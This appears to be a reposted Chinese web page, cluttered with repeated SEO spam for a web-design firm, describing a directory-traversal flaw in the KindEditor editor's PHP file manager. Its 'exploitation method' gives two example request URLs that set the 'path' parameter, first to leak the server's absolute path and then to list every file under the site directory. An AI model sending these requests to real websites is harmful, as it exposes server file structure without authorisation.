加入收藏 | 设为首页 | 会员中心 | 我要投稿 | 在线留言 | RSS
成网科技业务包括域名空间企业网站制作
 
国际域名com/net/org仅售80元/年
1G独立空间(PHP+MYSQL)仅售600元/年
您当前的位置:首页 > 技术交流 > 网络安全 > 漏洞分析

Kindeditor遍历目录0DAY问题

时间:2015-08-29 12:10:59  来源:互联网  作者:佚名  点击:

KindEditor是一套开源的HTML可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,兼容IE、Firefox、Chrome、Safari、Opera等主流浏览器。 KindEditor使用JavaScript编写,可以无缝的于Java、.NET、PHP、ASP等程序接合。 KindEditor非常适合在CMS、商城、论坛、博客、Wiki、电子邮件等互联网应用上使用,2006年7月首次发布2.0以来,KindEditor依靠出色的用户体验和领先的技术不断扩大编辑器市场占有率,目前在国内已经成为最受欢迎的编辑器之一。 efz成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
efz成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
利用方法: efz成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
efz成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
1.http://localhost/67cms/kindeditor/php/file_manager_json.php?path=/ efz成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
//path=/,爆出绝对路径D:/AppServ/www/67cms/kindeditor/php/file_manager_json.php efz成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
efz成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
efz成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
2.http://localhost/67cms/kindeditor/php/file_manager_json.php?path=AppServ/www/67cms/ efz成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
//根据爆出的绝对路径,修改path的值为AppServ/www/67cms/ efz成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
这时将遍历d:/AppServ/www/67cms/下的所有文件和文件名 efz成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
efz成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
成网科技 www.it28.com竭诚为您服务!
开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设_成网科技

更多
 


来顶一下
返回首页
返回首页
发表评论 共有条评论
用户名: 密码:
验证码: 匿名发表
推荐资讯
相关文章
栏目更新
栏目热门